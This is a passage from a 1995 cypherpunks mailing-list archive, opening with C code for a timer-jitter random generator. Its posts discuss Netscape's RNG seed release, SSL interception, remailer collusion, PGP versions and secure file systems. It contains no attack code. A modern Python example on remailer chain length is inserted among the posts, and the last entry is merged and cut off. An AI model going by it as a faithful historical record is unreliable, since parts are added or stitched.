/* SIGALRM handler: if the counter has started, jump back into
 * roulette(); otherwise re-arm and keep waiting. */
static void interrupt(int sig)
{
	if (count)
		longjmp(env, 1);
	(void) signal(SIGALRM, interrupt);
	tick();
}

/* Spin as fast as the CPU allows until the timer fires.  The low bits
 * of the count depend on timer/CPU jitter; three of them are folded
 * into buffer per call. */
static unsigned long roulette(void)
{
	if (setjmp(env)) {
		count ^= (count>>3) ^ (count>>6) ^ ocount;
		count &= 0x7;
		ocount = count;
		buffer = (buffer<<3) ^ count;
		return buffer;
	}
	(void) signal(SIGALRM, interrupt);
	count = 0;
	tick();
	for (;;)
		count++;	/* about 1 MHz on VAX 11/780 */
}

/* Eleven rounds of three bits each fill a 32-bit word; see the WARNING
 * above for how much of that to trust. */
unsigned long truerand(void)
{
	count = 0;
	(void) roulette();
	(void) roulette();
	(void) roulette();
	(void) roulette();
	(void) roulette();
	(void) roulette();
	(void) roulette();
	(void) roulette();
	(void) roulette();
	(void) roulette();
	return roulette();
}

/* Uniform value in [0, n): drop the sign bit and reject the biased
 * tail instead of taking a raw modulus. */
int n_truerand(int n)
{
	int slop, v;

	slop = 0x7FFFFFFF % n;
	do {
		v = truerand() >> 1;
	} while (v <= slop);
	return v % n;
}

From sameer at c2.org Sun Sep 24 17:38:13 1995 From: sameer at c2.org (sameer) Date: Sun, 24 Sep 95 17:38:13 PDT Subject: Netscape giving away T-shirts? Message-ID: <199509250033.RAA28349@infinity.c2.org> My ex-gf just told me on the phone that her boss mentioned that Netscape was giving away T-shirts to people who found holes. Apparently her boss saw this on the news. 
Interesting. ;-) (For the over-stressed and/or humor-impaired: I'm not implying that netscape is giving away t-shirts, just commenting on the accuracy of the media.) -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From eay at mincom.oz.au Sun Sep 24 17:47:19 1995 From: eay at mincom.oz.au (Eric Young) Date: Sun, 24 Sep 95 17:47:19 PDT Subject: SSL Man-in-the-middle In-Reply-To: <199509221407.KAA23176@gatekeeper.itribe.net> Message-ID: On Fri, 22 Sep 1995, David J. Bianco wrote: > Has anyone given much thought to the feasibility of a man-in-the-middle > attack against an SSL (or other similar) transaction? To me, the > possibility seems obvious, so I figure it must have been discussed before, > though I haven't seen it. .... > Since neither the browser nor the server perform any authentication checks, > neither Bob nor Alice know they are really speaking to Mallet. The best > Alice can do is check the IP address of the client she's speaking to, but Ah, err, the infamous problem of Netscape Navigator refusing to talk to SSL httpd's because they don't have a certificate issued by Verisign is caused by the client authenticating the server certificate. To get a Verisign-signed X.509 certificate requires quite a bit of proof that your company is who they claim they are. So server authentication is used. 
eric -- Eric Young | Signature removed since it was generating AARNet: eay at mincom.oz.au | more followups than the message contents :-) From rfb at lehman.com Sun Sep 24 18:08:22 1995 From: rfb at lehman.com (Rick Busdiecker) Date: Sun, 24 Sep 95 18:08:22 PDT Subject: Cybersecurity In-Reply-To: Message-ID: <9509250107.AA05910@cfdevx1.lehman.com> Date: Thu, 21 Sep 1995 06:13:40 -0400 (EDT) From: Duncan Frissell On Thu, 7 Sep 1995 hallam at w3.org wrote: > The UK Labour party is opposed to key escrow "we do not accept > the "clipper chip" argument". The Tories have less than half the > level of popular support and are barely recognisable as a > government. > > Phill Wait till Labour finds out that crypto makes "The Caring Society" impossible. Perhaps they'll change their view then. Ok, I'll bite. What do you mean? I'm guessing that you're talking about the fact that fully applied crypto (e. g. fully anonymous digital cash) makes it essentially impossible to base a tax system on income. With full application in place, a government would be forced to shift the basis of the tax system toward `real assets' and the receiving of goods and services within its borders. However, outside of transactions involving pure information exchange, this simply shifts things from one side to the other in a relationship where the basic ideas behind capitalism suggest that both sides should be more or less equal. That is, you're not taxed based on money changing hands, but rather on the more tangible things that are the reason for the money changing hands. To use the over-used grocery store example, you're taxed on what you carry out in your basket, without regard to any money that may or may not have changed hands before, during or after you went to the store. Earnings tend to correlate reasonably well with receiving goods and services, at least over long periods of time. Also most people are more or less tied to a certain area of the world. 
Certainly there are exceptions, but the average case is more relevant when considering what sorts of governmental policies are possible. Given this, I think that crypto is more likely to result in a readjustment of the details than a fundamental change in the relationships between various elements of society. I don't mean to suggest that these relationships can't or won't change, just that strong crypto is not a magic pill that can transform everything by itself. Fundamental changes are the results of the interplay of a wide array of forces. -- Rick Busdiecker Please do not send electronic junk mail! net: rfb at lehman.com or rfb at cmu.edu PGP Public Key: 0xDBD9994D www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html send mail, subject "send index" for mailbot info, "send pgp key" gets my key From mixmaster at gondolin.org Sun Sep 24 18:14:30 1995 From: mixmaster at gondolin.org (Freedom Remailer) Date: Sun, 24 Sep 95 18:14:30 PDT Subject: No Subject Message-ID: <199509250105.UAA11700@anduin.gondolin.org> Post: Spy Agency Hoards Secret $1 Billion WASHINGTON (AP) - The super secret agency that manages the nation's spy satellite program has built up unspent funds totaling more than $1 billion without informing Congress or even its supervisors at the Pentagon and CIA, according to a published report. The Washington Post cited unidentified Capitol Hill sources in Sunday editions as saying the ability of the National Reconnaissance Organization to put away so much money from its classified multibillion-dollar budget reaffirmed concerns that intelligence agencies sometimes use their secret status to avoid accountability. The Post said the funds, called a "pot of gold" by one Senate aide, were discovered after the Senate intelligence committee raised questions more than a year ago about a $300 million new headquarters building the agency was building in suburban Virginia. 
The committee determined that the agency, not generally known to Congress, was using base operating funds it already had without seeking a specific appropriation for the building. The pool of unspent money accumulated as a result of NRO's practice of having Congress pay in advance for multiyear, billion-dollar-plus satellite programs, the Post quoted CIA Director John Deutch as saying in an interview. Agency managers let incoming funds pile up when spending on contracts took place at a slower pace than planned. Although he said a CIA inquiry found nothing illegal about how the NRO handled the money, Deutch told the Post he put a new chief financial officer in at the agency and ordered a "separate budget scrub" of all its programs. NRO's funding is part of the Pentagon budget, but many of the agency's intelligence programs are under CIA supervision. The Post said one congressional aide put the total of unspent funds as high as $1.7 billion, but that others said it could turn out to be less than $1 billion. It said Deutch declined to put a figure on the unspent money. Story Number: 00598 Story Date: 9/23/95 This material may not be redistributed. Copyright 1995. The Associated Press. All rights reserved. From ses at tipper.oit.unc.edu Sun Sep 24 18:25:28 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Sun, 24 Sep 95 18:25:28 PDT Subject: Important consequence of existence of compromised Netscape certificates In-Reply-To: <199509242121.RAA08234@frankenstein.piermont.com> Message-ID: There's one very important side-effect of the existence of a large number of compromised certificates accepted by navigator: the upgraded clients must either do CRL processing, or the roots used to sign all possibly compromised keys *must* be rejected by the fixed navigator. 
Simon From stevenw at iglou.com Sun Sep 24 18:28:23 1995 From: stevenw at iglou.com (Steven Weller) Date: Sun, 24 Sep 95 18:28:23 PDT Subject: Crypto in Wired Message-ID: >Good issue of Wired this month (10/95) > >Vic Sussman has a half page on PGPfone. Asked why he's giving away PGPfone >with an indictment hanging over his head Zimmermann says "... I am a >cryptographer. This is what I do". You need the full quote to get the real effect: <> That is a remarkably concise, intelligent, informative, unequivocal, savvy, and personal statement. Hats off to PZ (or whoever told him to say that). ------------------------------------------------------------------------- Steven Weller | "The Internet, of course, is more +1 415 390 9732 | than just a place to find pictures | of people having sex with dogs." stevenw at iglou.com | -- Time Magazine, 3 July 1995 From karlton at neon.netscape.com Sun Sep 24 19:39:47 1995 From: karlton at neon.netscape.com (Phil Karlton) Date: Sun, 24 Sep 95 19:39:47 PDT Subject: Netscape "random" number seed generator code available Message-ID: <4454nu$da8@tera.mcom.com> Once again I speak for myself and not Netscape. The random number seed generation code is now available for review: ftp://ftp1.netscape.com/pub/review/RNGsrc.tar.Z The README from that file is appended below. Netscape has fixed other less glaring but potentially interesting problems and those fixes will be included with the patch that goes out in the near future. As is mentioned in the README, more will need to be done to find more bits of entropy. (Too much of a good thing is still not enough.) However the security team believes that the RNG seed is no longer the weak link and candidate for attack. So I am personally volunteering to have my head shaved if a discovered deficiency in this code results in an easily attacked generated seed. [You will be expected to show your work. 
:-)] ============================== README =========================== This code represents the heart of Netscape's random number seed generator. The initialization routines are called by the various client front ends and servers and other Netscape software. Furthermore, the server will be putting seed information into the environment of each of the CGI invocations. Here are some things a client does: * Application specific files are passed to SEC_FileForRNG(). For the client this includes the global history file. * The clients then read a portion of the screen depending upon the current state of the hash. * The Update functions feed into an MD5 hash. The MD5 code isn't ours to publish. * User input is used for server side key generation and in client front ends for increasing RNG state entropy over time. This code needs to be portable. We can't access device specific registers that are not guaranteed to be on all relevant platforms. Recommendations to users of Netscape who rely on the security of their transactions: If the attacker has physical access to your machine, security cannot be assured. Netscape continues to point out that if unwanted agents can log into your machine, little can be secure. For secure servers, any insecure connection mechanism could be suspect. Multi-user UNIX platforms will not be as secure as single-user machines. Details: Some of the system specific information that is used in the seed generation is available to any user on that system. To help mitigate this, the entire user environment is passed into the seed generation algorithm. A wary user can alter his user environment before running Netscape software. If someone can get root (superuser) access to your machine, they can pretty much do anything. Netscape security could be weak if run on a platform emulator. Use a version native to the platform on which you are running. 
Details: Some of the usefulness of the seed generation depends upon the unpredictability of the low order bits of various clocks and timers. The clocks of many emulators may have much less entropy than the actual builtin clocks. If you are running on a UNIX platform, make sure of the security of your X server. This is also true if the X connection is not to a local machine as all of the events and the data from the screen read may be captured from the ethernet. Details: If the attacker is monitoring your user input then its randomness is not useful. It is better to perform some user action before connecting to a secure site. This means you should not set your home page to a secure site or launch your client from a command line to a secure site. Details: While navigating through menus or typing into various form fields, the Navigator uses the unpredictability of details of the user actions to increase the entropy of the RNG state. For this patch, proposed changes had to fit into the existing code and UI structure. We will rely on the user interactions leading to the initial secure page. In future versions, the Navigator will force the user to explicitly use the keyboard or mouse to help generate the initial seed before doing any secure transactions. That seed will be maintained across invocations of the Navigator. The files are not compilable as is. They have been extracted from the Netscape's cross platform build environment, and all of the headers needed to compile them are not included. They should be compilable with some simple edits on their platforms (MFC on Windows, CodeWarrior on Mac). ================================================================= PK -- -- Philip L. 
Karlton karlton at netscape.com Principal Curmudgeon http://www.netscape.com/people/karlton Netscape Communications Corporation From mixmaster at gondolin.org Sun Sep 24 19:49:38 1995 From: mixmaster at gondolin.org (Freedom Remailer) Date: Sun, 24 Sep 95 19:49:38 PDT Subject: No Subject Message-ID: <199509250241.VAA12182@anduin.gondolin.org> > Newsgroups: alt.privacy.anon-server > From: shamrock at netcom.com (Lucky Green) > Subject: The subtle danger of using Mixmaster > Message-ID: > Sender: shamrock at netcom19.netcom.com > Organization: NETCOM On-line Communication Services (408 261-4700 guest) > X-Newsreader: Yet Another NewsWatcher 2.0 > Date: Sun, 24 Sep 1995 19:51:30 GMT > Lines: 19 > > There are about twenty Mixmaster remailers. Reason to celebrate? Hardly. > Though we have more remailers than ever, I doubt that the twenty or so > Mixmasters are operated by more than six or seven people. I would not be > surprised to find out that some folks are running several Mixmasters on > the _same_ machine, using different IP addresses. > > While the enthusiasm for increasing the number of remailers is > understandable, the operation of more than one Mixmaster by the same > person is downright dangerous, because it reduces the effective length of > the remailer chain. The message that you sent through five remailers may > have only been handled by two operators. When you thought that five people > had to collaborate to trace your email, only two are in fact required to do > so. > > Comments? > > -- > -- Lucky Green > PGP encrypted mail preferred. > From bret at bjohns.win.net Sun Sep 24 19:59:07 1995 From: bret at bjohns.win.net (Bret A. Johnson) Date: Sun, 24 Sep 95 19:59:07 PDT Subject: What version of PGP? Message-ID: <1903@bjohns.win.net> I got PGP 262 off MIT. The file was PGP262si.tar Is this the international version with weak crypto? or is it the US version? Thanks.... 
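Lucky Green's Mixmaster point above (a five-hop chain handled by two operators is a two-hop chain as far as collusion goes) can be made mechanical. The Python below is an added example written for this archive; it is not code from the thread, from Mixmaster, or from any remailer operator. The remailer names, operators and host addresses in it are constructed for illustration. It scores a chain by distinct operators rather than hops, flags hops that share a machine (Lucky's "different IP addresses" case), and builds a chain whose hops are pairwise independent, refusing rather than padding when the pool is too small.

```python
"""Effective length of a remailer chain, counted in operators, not hops.

Added example: the remailer names, operators and addresses below are
constructed for illustration and are not a real Mixmaster list.
"""
from collections import Counter

# remailer name -> who runs it and where it runs (constructed sample data)
REMAILERS = {
    "alpha":   {"operator": "op1", "host": "198.51.100.10"},
    "bravo":   {"operator": "op1", "host": "198.51.100.10"},  # same box as alpha
    "charlie": {"operator": "op2", "host": "198.51.100.20"},
    "delta":   {"operator": "op2", "host": "203.0.113.5"},
    "echo":    {"operator": "op3", "host": "203.0.113.9"},
    "foxtrot": {"operator": "op4", "host": "192.0.2.77"},
}


def colluders_needed(chain, remailers=REMAILERS):
    """Parties who must cooperate to trace a message through `chain`.

    An operator who runs several hops in the chain counts once: they
    already see the message entering and leaving each of their own hops.
    """
    return sorted({remailers[hop]["operator"] for hop in chain})


def effective_length(chain, remailers=REMAILERS):
    """Chain length as Lucky Green counts it: distinct operators, not hops."""
    return len(colluders_needed(chain, remailers))


def shared_hosts(chain, remailers=REMAILERS):
    """Hosts that appear more than once in `chain`.

    Two "different" remailers on one machine are one hop in every sense
    that matters; listing them flags the chain for review.
    """
    hits = Counter(remailers[hop]["host"] for hop in chain)
    return sorted(host for host, n in hits.items() if n > 1)


def build_chain(length, remailers=REMAILERS):
    """Choose `length` hops with pairwise-distinct operators and hosts.

    Returns None when the pool cannot supply that many independent hops;
    that is the honest answer, rather than padding the chain with
    duplicates that add latency but no anonymity.
    """
    chain, operators, hosts = [], set(), set()
    for name, info in remailers.items():
        if info["operator"] in operators or info["host"] in hosts:
            continue
        chain.append(name)
        operators.add(info["operator"])
        hosts.add(info["host"])
        if len(chain) == length:
            return chain
    return None


if __name__ == "__main__":
    naive = ["alpha", "bravo", "charlie", "delta", "echo"]
    print(len(naive), "hops, but only", effective_length(naive),
          "operators:", colluders_needed(naive))
    print("shared hosts:", shared_hosts(naive))
    print("independent 4-hop chain:", build_chain(4))
    print("independent 5-hop chain:", build_chain(5))
```

With the sample data, the five-hop chain collapses to three operators and two of its hops sit on one host; the pool can supply four independent hops but not five, so build_chain(5) returns None. In practice the operator and host columns would come from the remailer's published key and stats lists, and the mapping is only as good as what operators disclose.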
From rsalz at osf.org Sun Sep 24 20:50:11 1995 From: rsalz at osf.org (Rich Salz) Date: Sun, 24 Sep 95 20:50:11 PDT Subject: Defense against a class of programming bugs Message-ID: <9509250349.AA27055@sulphur.osf.org> >Unfortunately, strdup is not posix compliant. If you want to use >it and maintain portability, you'll have to write your own. Er, you're kidding, right? drand48 isn't in Posix either, for example. Someone who runs on Motif and Mac has strdup as the least of their worries. But just in case it's stopping anyone:

/* Includes added; the snippet was posted without them. */
#include <stdlib.h>	/* malloc */
#include <string.h>	/* strlen, strcpy */

char *strdup(const char *x)
{
	char *p;
	return (p = malloc(strlen(x) + 1)) ? strcpy(p, x) : 0;
}

(Deliberately written too-cleverly. Lame compilers will need to cast to 0) From samman-ben at CS.YALE.EDU Sun Sep 24 20:50:36 1995 From: samman-ben at CS.YALE.EDU (Rev. Ben) Date: Sun, 24 Sep 95 20:50:36 PDT Subject: John Deutsch Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Is coming to Yale tomorrow and I'm going to get the opportunity to have tea with him (and about 10 other folks). Is there anyone here that has anything that they want me to ask the man? Ben. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3 iQB1AwUBMGYm+r5ALmeTVXAJAQFeIQL9FmuCB93W4XANBdyQBOg224WW/sVetRI8 AZhM3HHjvNJ41YT7LCnRjLeRU1nUeBX1cI5MWBLNmKQXqR8+XmqboVU/k3jOxndy bNhH4rqb/zgH1cD65lo7IbTsVOJoHeDe =18Lm -----END PGP SIGNATURE----- From futplex at pseudonym.com Sun Sep 24 20:57:27 1995 From: futplex at pseudonym.com (Futplex) Date: Sun, 24 Sep 95 20:57:27 PDT Subject: Patents and trade secrets was: Encryption algorithms used in In-Reply-To: <306319E6@hamachi> Message-ID: <9509250357.AA21926@cs.umass.edu> David van Wie misattributed thus: > Perry E. Metzger at Sep 22, 95 01:19:37 am wrote: > > >David Van Wie writes: > >> It just moves the prior art date from the date of invention to the date > >> of filing the patent application. > > >What happens if the chronology goes like this ? > > > >(0) Alice invents a snaffleblort. 
> >(1) Bob invents a snaffleblort. > >(2) Bob files for a patent on a snaffleblort. > > > >From what you said, it would appear that Alice's prior art won't count when > >it comes to considering the validity of Bob's patent claim. Is that correct > ? I actually asked those questions, not Perry. Check your attributions, please. -Futplex From rsalz at osf.org Sun Sep 24 21:03:36 1995 From: rsalz at osf.org (Rich Salz) Date: Sun, 24 Sep 95 21:03:36 PDT Subject: John Deutsch Message-ID: <9509250402.AA27079@sulphur.osf.org> >Is there anyone here that has anything that they want me to ask the man? Why did he argue against MIT getting rid of Lincoln Labs? From jirib at sweeney.cs.monash.edu.au Sun Sep 24 21:06:43 1995 From: jirib at sweeney.cs.monash.edu.au (Jiri Baum) Date: Sun, 24 Sep 95 21:06:43 PDT Subject: real randomness for netscape - user clicking mouse In-Reply-To: Message-ID: <199509250402.OAA17312@sweeney.cs.monash.edu.au> -----BEGIN PGP SIGNED MESSAGE----- Hello Vincent Cate and cypherpunks at toad.com and jsw at neon.netscape.com Vincent Cate wrote: [about getting entropy from mouse] > You must get the random bits from something that nobody else could watch. ... > other hand, an attacker would have to have broken the machine to get the > mouse info ... Not really... Have you ever been on an X system with host-based security (as opposed to xauth)? Anyone who has user login rights to the machine you're on (*) can just telnet in and open windows on your screen, blink the leds on your keyboard, install fonts, confine the mouse to a given screen area, etc. I understand that normally they can get a copy of every X event you get (and filter them), but I've never tried... (*) More accurately, any of the machines you can run X programs from. Mouse events might not be as secret as we would like... Jiri - -- If you want an answer, please mail to . On sweeney, I may delete without reading! 
PGP 463A14D5 (but it's at home so it'll take a day or two) PGP EF0607F9 (but it's at uni so don't rely on it too much) -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMGYpmyxV6mvvBgf5AQFkxwQAif9RTKJRW9IhZxd1zp4kmEdHbf4IkdMX OgEhgeMf6d9+iyTnwZJjR/YvSOsonueKHxR+gmQWotf5r9Y7FmLCFLxw8U0F5AF3 wUjQtqnTlWEU5jt57bn3KZFs5EFqdKKAgj9J7qLlflKd2Bm0mAXK4S8mWIP2U7xu Sl5UbU3KcqE= =zlW+ -----END PGP SIGNATURE----- From futplex at pseudonym.com Sun Sep 24 21:28:51 1995 From: futplex at pseudonym.com (Futplex) Date: Sun, 24 Sep 95 21:28:51 PDT Subject: Net KiddiePorn Hype on TV Message-ID: <9509250428.AA22310@cs.umass.edu> Yet Another Alarmist TV Show About Child Molesters on the Net: During their coverage of an NFL game on Sunday, the Fox announcers plugged an upcoming episode (sometime this week) of _New York Undercover_. They used a depressing line like "Think the Net is a safe place to play ? Think again !" Apparently the show will portray a child molester luring kids via the Net, etc., etc. "In a story pulled straight from today's headlines !" Anyway, the mainstream media trashing of the Net continues. Check your local listings. -Futplex From chen at intuit.com Sun Sep 24 21:51:52 1995 From: chen at intuit.com (Mark Chen) Date: Sun, 24 Sep 95 21:51:52 PDT Subject: macworld crypto articles In-Reply-To: <199509241745.NAA20271@toast.ai.mit.edu> Message-ID: <9509250445.AA19394@doom.intuit.com> > In article <4444rl$nrh at life.ai.mit.edu> Chen writes: > > It's truly a deplorable state of affairs. > > For the next version, include PGP free with every version of Quicken, > and have Quicken just "call" PGP. > > Of course, users can encrypt their files now with PGP. Is there an > Intuit bboard where someone could post instructions? This is a good idea. I'll bring it up with the appropriate people. Right now, we only have some cheesy forums going on Compuserve and Prodigy; however, keep your eyes peeled. We have other stuff in the works. 
- Mark - -- Mark Chen chen at intuit.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From khijol!erc Sun Sep 24 22:22:41 1995 From: khijol!erc (Ed Carp [khijol SysAdmin]) Date: Sun, 24 Sep 95 22:22:41 PDT Subject: Colin Powell coming to Dallas Message-ID: <199509250514.AAA12608@khijol> -----BEGIN PGP SIGNED MESSAGE----- Colin Powell will be in Dallas at the Taylor's Bookstore out on Belt Line Rd. and Prestonwood (right next to Prestonwood Mall). October 3 at 6 PM. I plan to be there - anyone else from the DFW area going? Anyone have any questions they want asked (other than the usual "where do you stand on the administration's position regarding the use and exportation of so-called 'strong crypto' and the Clipper/Capstone fiasco"? - -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 -----END PGP SIGNATURE----- From Mike_Spreitzer.PARC at xerox.com Sun Sep 24 22:30:44 1995 From: Mike_Spreitzer.PARC at xerox.com (Mike_Spreitzer.PARC at xerox.com) Date: Sun, 24 Sep 95 22:30:44 PDT Subject: secure file system for Linux? Message-ID: <95Sep24.223025pdt."15556(4)"@alpha.xerox.com> Is there a secure file system (or secure directory branch) for Linux? From warlord at MIT.EDU Sun Sep 24 22:50:05 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Sun, 24 Sep 95 22:50:05 PDT Subject: What version of PGP? In-Reply-To: <1903@bjohns.win.net> Message-ID: <199509250549.BAA20660@toxicwaste.media.mit.edu> > I got PGP 262 off MIT.
> > The file was PGP262si.tar > > Is this the international version with weak crypto? or is it the US > version? Actually, the file you got was pgp262s.tar.gz (or something equivalent.) Inside this tarfile you found pgp262si.tar, which is the Source, Internal tarfile. It is not an international version; it is the US version. Also, neither the US version nor any international versions have weak crypto. Enjoy! -derek From mch at squirrel.com Sun Sep 24 23:08:06 1995 From: mch at squirrel.com (Mark C. Henderson) Date: Sun, 24 Sep 95 23:08:06 PDT Subject: secure file system for Linux? Message-ID: <199509250608.XAA17676@squirrel.com> > Is there a secure file system (or secure directory branch) for Linux? Yes, you can use CFS, which works on several versions of UNIX as well as Linux. Send email to cfs at research.att.com to get a copy. Someone exported it, and it is also available from ftp://ftp.hacktic.nl/pub/crypto/CRYPTOapps/cfs.1.3.tar.gz There is also something called the "loop filesystem" for Linux. I haven't tried it and don't know how well it would integrate into the newer Linux kernels. ftp://tsx-11.mit.edu/pub/linux/BETA/loop -- Mark Henderson -- markh at wimsey.bc.ca, henderso at netcom.com, mch at squirrel.com PGP 1024/C58015E3 fingerprint=21 F6 AF 2B 6A 8A 0B E1 A1 2A 2A 06 4A D5 92 46 cryptography archive maintainer -- ftp://ftp.wimsey.com/pub/crypto ftp://ftp.netcom.com/pub/he/henderso/change-sun-hostid-1.5.0.tar.gz From jsw at neon.netscape.com Sun Sep 24 23:16:43 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Sun, 24 Sep 95 23:16:43 PDT Subject: Netscape for Linux? In-Reply-To: <199509240436.VAA28304@ix5.ix.netcom.com> Message-ID: <445hej$h03@tera.mcom.com> In article <199509241746.KAA01423 at goblin.punk.net>, jsimmons at goblin.punk.net (Jeff Simmons) writes: > As a Linux user and advocate, I've gotta agree here.
I'm glad that > Netscape is going to continue to supply us with an unsupported binary, > and I can't blame them a bit for not wanting to support an OS where > every user has his own private version number ... would be nice if we > could get 128 bit keys, though ... (hint, hint). We are working this issue with the government. As soon as we can make it available for download we will. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jsw at neon.netscape.com Sun Sep 24 23:24:16 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Sun, 24 Sep 95 23:24:16 PDT Subject: Netscape for Linux? In-Reply-To: <3064BDFB.717F@netscape.com> Message-ID: <445hso$h03@tera.mcom.com> In article <199509242006.PAA02258 at khijol>, khijol!erc at uunet.uu.net (Ed Carp [khijol SysAdmin]) writes: > > > And the sad part is that now that they have announced that they are > > > dropping their unofficial Linux support, > > > > I have no current plans to alter our treatment of Linux. It is not now, > > nor has it ever been, a supported platform. We do build for it, > > and some people are happy about that. > > Does this mean that a Linux version of Netscape will no longer be > available, or that it *will* be available but unsupported? It will be available as it has been in the past, which means unsupported. That means that if you have a bug, and you try to call us for help, we will not provide it. > > I have not constructed a business case which would cause Netscape > > to begin support for Linux versions of the Navigator. Right now, I'm > > not sure that making a point of this would do what you want. > > That all depends on what you mean by "support". If you mean "we will no > longer make Netscape available for the Linux platform", that's not > support. 
If you mean "we will no longer respond to bug reports for > Netscape on this platform" then that's discontinuing support. We have never officially responded to bug reports on Linux. We do not take money for it for just this reason. This does not mean that we will not fix bugs that are reported via our feedback page. It doesn't mean we will fix them either... --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jsw at neon.netscape.com Sun Sep 24 23:43:25 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Sun, 24 Sep 95 23:43:25 PDT Subject: Netscape "random" number seed generator code available In-Reply-To: <4454nu$da8@tera.mcom.com> Message-ID: <445j0o$h03@tera.mcom.com> In article <4454nu$da8 at tera.mcom.com>, karlton at neon.netscape.com (Phil Karlton) writes: > Details: While navigating through menus or typing into various form > fields, the Navigator uses the unpredictability of details of the > user actions to increase the entropy of the RNG state. Note that clicking in the main window or on URLs, and timing of network activity cause the state of the RNG to be updated. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jsw at neon.netscape.com Sun Sep 24 23:46:33 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Sun, 24 Sep 95 23:46:33 PDT Subject: Netscape "random" number seed generator code available In-Reply-To: <4454nu$da8@tera.mcom.com> Message-ID: <445j6k$h03@tera.mcom.com> More on the RNG stuff. On Unix systems we look for ~/.pgp/randseed.bin, and feed it through the RNG hash. On Unix and PC systems we feed the environment through the hash, so that would be a good place for a concerned user to put some random stuff of their own. 
--Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From rjc at clark.net Sun Sep 24 23:49:16 1995 From: rjc at clark.net (Ray Cromwell) Date: Sun, 24 Sep 95 23:49:16 PDT Subject: New Netscape RNG Message-ID: <199509250649.CAA27099@clark.net> I just glanced at the new Netscape RNG source. I don't really see anything bad, but I haven't analyzed it. However, I'm curious as to why variables like the username or the language locality are used as sources of entropy. These seem to provide almost nil. The username is going to be pretty much constant. In fact, even the current directory which is used as a seed can't provide more than a few bits of entropy. In all probability, the user name will usually be the same, and so will the current directory (and how many directories are there? 65,000 would only give you 16 bits of entropy, assuming you get a directory listing from the machine) I'm thinking from the standpoint of someone gathering data on someone or some server to mount a specific attack. A "most common directories on the macintosh" file for instance could be used to attack the current directory method. Using those sources probably can't hurt, they just seemed like odd choices, "grasping for straws" so to speak. Nevertheless, I would like to commend Netscape for releasing the source code for public review. You guys are clearly an intelligent company, in both your current developments, but also the way you have handled this bad press. -Ray P.S. I hope you guys do a good internal review of your code to remove buffer overflow bugs From khijol!erc Sun Sep 24 23:52:53 1995 From: khijol!erc (Ed Carp [khijol SysAdmin]) Date: Sun, 24 Sep 95 23:52:53 PDT Subject: secure file system for Linux?
In-Reply-To: <95Sep24.223025pdt."15556(4)"@alpha.xerox.com> Message-ID: <199509250630.BAA14157@khijol> -----BEGIN PGP SIGNED MESSAGE----- > Is there a secure file system (or secure directory branch) for Linux? The only one I know of is Matthew Blaze's CFS. - -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 -----END PGP SIGNATURE----- From alano at teleport.com Mon Sep 25 00:05:17 1995 From: alano at teleport.com (Alan Olsen) Date: Mon, 25 Sep 95 00:05:17 PDT Subject: Netscape giving away T-shirts? Message-ID: <199509250705.AAA26210@desiree.teleport.com> At 05:33 PM 9/24/95 -0700, you wrote: > My ex-gf just told me on the phone that her boss mentioned >that Netscape was giving away T-shirts to people who found holes. >Apparently her boss saw this on the news. Interesting. ;-) > > (For the over-stressed and/or humor-impaired: I'm not implying >that netscape is giving away t-shirts, just commenting on the accuracy >of the media.) Considering that they do give out a fair amount of shirts, they might actually be doing this now. (If it was for bugs they would owe me quite a few shirts. ];>) If they offer you a shirt, ask for one of the "Mosaic Communications Corporation" t-shirts. (The one with the old version of Mozilla on the back.) They are evidently considered a status symbol at Netscape corporate. (And, no, you cannot have mine.)
| Minister of Forced Caffinization in the DNRC | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From hroller at c2.org Mon Sep 25 00:11:09 1995 From: hroller at c2.org (Hroller Anonymous Remailer) Date: Mon, 25 Sep 95 00:11:09 PDT Subject: No Subject Message-ID: <199509250706.AAA26206@infinity.c2.org> Message-ID: <199509250712.CAA01003@khijol> -----BEGIN PGP SIGNED MESSAGE----- > In article <199509242006.PAA02258 at khijol>, khijol!erc at uunet.uu.net (Ed Carp [khijol SysAdmin]) writes: > > > > And the sad part is that now that they have announced that they are > > > > dropping their unofficial Linux support, > > > > > > I have no current plans to alter our treatment of Linux. It is not now, > > > nor has it ever been, a supported platform. We do build for it, > > > and some people are happy about that. > > > > Does this mean that a Linux version of Netscape will no longer be > > available, or that it *will* be available but unsupported? > > It will be available as it has been in the past, which means unsupported. > That means that if 